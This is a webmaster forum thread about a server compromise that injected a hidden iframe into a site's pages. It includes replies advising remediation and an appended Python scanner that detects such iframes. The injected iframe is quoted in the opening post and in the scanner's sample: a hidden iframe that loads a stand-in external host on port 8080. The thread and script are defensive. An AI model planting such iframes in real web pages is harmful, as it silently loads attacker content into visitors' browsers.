Iframe Injections

My site keeps getting hijacked by a killer iframe script.

         

acimag

2:04 pm on Jun 4, 2009 (gmt 0)

10+ Year Member



I am currently hosted on The Planet on a dedicated server.

We have put Mod_Security into effect and blocked all known bad bots from the server.

However, we have been getting attacked by iframes negatively affecting our search engine positions.

I have installed Serpguard and it has not warned me at all even when it was on the malicious list on Google.

<iframe src="http://example.com:8080/index.php" width=197 height=107 style="visibility: hidden"></iframe>

was injected right after the <body> tag.

We use the full version of the Sitemap Generator but we don't even have the generator installed on the account that got hijacked.

Also, in the server logs on the day of the attacks we see 1-second logins with really long random-string names, and the server shows ?@ cause even the server doesn't know who it is.

==================
Anyone have any ideas?

Any products to scan for open holes on our server?

Any other advice? Cause Serpguard only helps after the fact.

[edited by: jdMorgan at 3:42 pm (utc) on June 4, 2009]
[edit reason] example.com [/edit]

mattur

2:21 pm on Jun 4, 2009 (gmt 0)

WebmasterWorld Senior Member 10+ Year Member



Change passwords. Check security of all applications running on your server. Identify the attack vector the hackers are using to compromise your server and close it.

See this recent thread on iframe injections [webmasterworld.com]

acimag

2:41 pm on Jun 4, 2009 (gmt 0)

10+ Year Member



Let's say I'm not good at all with shell or PuTTY.

Is there another way to scan and find it?

mattur

4:12 pm on Jun 4, 2009 (gmt 0)

WebmasterWorld Senior Member 10+ Year Member



This is not a "run automated tool to fix" scenario.

Your problem isn't that something is injecting iframes, your problem is that someone has compromised your server. Who knows what else they've done while they've been in there?

You need to find out how they got in, close it and fix any damage they've done while they've been in there.

Contact your hosting company for assistance if you're unsure how to proceed. Switch to a fully-managed server if you don't have the time to manage it yourself. You must secure and monitor your server (and the applications on it) on an ongoing basis. Otherwise it will just happen again. And again. And again...

acimag

4:54 pm on Jun 5, 2009 (gmt 0)

10+ Year Member



We did contact the host; they are really no help. Anyone know anyone at The Planet... Cause I'd like to speak to someone who has a clue.

jdMorgan

1:23 pm on Jun 6, 2009 (gmt 0)

WebmasterWorld Senior Member 10+ Year Member



If you are not on a "managed dedicated server account," then you are responsible for securing and maintaining your server. This means you'll need expertise in server security, or you'll need to develop or hire that expertise. If you are getting "We can't help you" from your host, they may mean "We can't help you because you haven't signed up for a managed account, and the cost to us to fix your server would exceed your monthly (or semi-annual) hosting fee."

The previously-posted recommendations are sound. I'll add that part of "check security of all applications" is to make sure that all software installed on the server is the latest version, since only the latest version will have closed all known security holes. If you've got old versions of PHP or forum, blog, CMS, or database scripts on your server, then you're a sitting duck for malicious scanners to find and target for exploits.

Jim
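
Added example (not code from any poster in this thread): a Python audit that flags iframes matching the pattern in the opening post, meaning hidden styling, an external host, or a non-standard port. The own_hosts and exts parameters, the function names and the sample page are assumptions made for illustration; the script only locates injected markup and says nothing about how the server was compromised.

```python
import re
from html.parser import HTMLParser
from pathlib import Path
from urllib.parse import urlparse

HIDDEN_STYLE = re.compile(r"visibility\s*:\s*hidden|display\s*:\s*none", re.I)

class IframeAudit(HTMLParser):
    def __init__(self, own_hosts):
        super().__init__()
        self.own_hosts = {h.lower() for h in own_hosts}
        self.findings = []  # (line, src, [reasons]) per suspicious iframe
    def handle_starttag(self, tag, attrs):
        if tag != "iframe":
            return
        a = dict(attrs)
        src, reasons = a.get("src") or "", []
        try:
            url = urlparse(src)
            host, port = (url.hostname or "").lower(), url.port
        except ValueError:  # malformed URL: flag it instead of crashing
            host, port = "", -1
        if HIDDEN_STYLE.search(a.get("style") or ""):
            reasons.append("hidden-style")
        if host and host not in self.own_hosts:
            reasons.append("external-host")
        if port not in (None, 80, 443):
            reasons.append("odd-port")
        if reasons:
            self.findings.append((self.getpos()[0], src, reasons))

def audit_html(text, own_hosts=()):
    parser = IframeAudit(own_hosts)
    parser.feed(text)
    parser.close()
    return parser.findings

def scan_tree(root, own_hosts=(), exts=(".html", ".htm", ".php")):
    """Audit every page under a web root; return {path: findings}."""
    hits = {}
    for path in Path(root).rglob("*"):
        if path.is_file() and path.suffix.lower() in exts:
            text = path.read_text(encoding="utf-8", errors="replace")
            hits[str(path)] = audit_html(text, own_hosts)
    return {p: f for p, f in hits.items() if f}

# Constructed sample: the iframe from the opening post plus a same-site one.
SAMPLE = """<html><body>
<iframe src="http://example.com:8080/index.php" width=197 height=107 style="visibility: hidden"></iframe>
<h1>Welcome</h1><iframe src="/widgets/map.html" width="400" height="300"></iframe></body></html>"""
```

Run `scan_tree` against a copy of the web root and compare the flagged files with a known-good backup; an injected iframe is a symptom, so the entry point still has to be found and closed.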